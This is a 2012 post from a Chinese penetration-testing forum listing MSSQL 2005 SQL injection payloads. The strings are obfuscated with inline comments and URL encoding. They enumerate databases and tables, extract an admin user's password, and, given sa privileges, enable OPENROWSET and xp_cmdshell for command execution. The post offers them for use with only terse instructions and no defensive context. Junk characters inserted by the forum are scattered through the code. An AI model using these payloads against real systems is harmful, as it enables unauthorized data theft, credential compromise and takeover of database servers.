找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsql2005注入语句
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2338|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
' s7 R5 Z/ Y2 F  K$ Y" F% Q5 o' s( w
; f0 H# \! g$ g0 D" S% t1 D

/ p' s2 k2 M! R/ K. z. t[Copy to clipboard]CODE:! ]9 s1 R7 d& N* `
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--3 w* g/ G+ P2 Z5 M. Z  u
( e* Y. R. o" H! `$ }: }. j
爆表语句,somedb部份是所要列的数据库,红色数字1累加
% F: v8 }4 R3 s- i+ }; O8 M  C% }, Y  R6 [2 g

0 f, K2 Q! A( r[Copy to clipboard]CODE:
" a4 S1 ~+ N4 M/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
) c8 H: o$ d7 U( \' [( K8 Q$ p) k! b7 @; |( H& E$ O
爆字段语句,爆表admin里user='icerover'的密码段1 J6 g- W' t9 f6 U% |: c" [0 V" {
; I+ {7 {3 w) h" F

) ^9 S) ]. P& C2 @[Copy to clipboard]CODE:
  |/ r1 ~# h- W) ?9 r. q4 {**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
+ `) p. q6 m+ @; r  u" `. `# ~8 ?! W8 i: r" _
mssql2005默认没有开xp_cmdshell的,openrowset也不能用4 I& V9 a* o8 p; Q! H: @9 |! n+ m
如果是sa权限,可以这样来开启" C; t6 t- p+ k7 D
开启openrowset" A( }$ T2 X# ^  @1 a$ ^$ f# N! T

4 g: Y  q" }% X. A( D( W# \2 C* H) S( V0 Y9 R6 W# J( H0 T" O
[Copy to clipboard]CODE:
0 K3 [: ?4 O5 ?3 k/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--+ N1 v4 ^( [9 j  f# O2 r3 p! R
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
$ @9 n( f" a3 n
# n+ L0 s- f- T9 \. ?0 h2 T$ R$ b开启xp_cmdshell6 ~/ C( {" @+ U0 a" C
) m1 W# _/ v2 F. S' G" a

1 Z. M' ]: f/ w& S1 m7 Z[Copy to clipboard]CODE:
: e5 V( T$ l( t4 y! `EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--2 {; q1 c! v' M, G1 a% [0 ?
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--- L+ `1 u0 ~0 L" u

  |$ ^% u7 u2 U9 V1 Ook,over~~晚安0 o' y  }' u- Z9 A3 p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表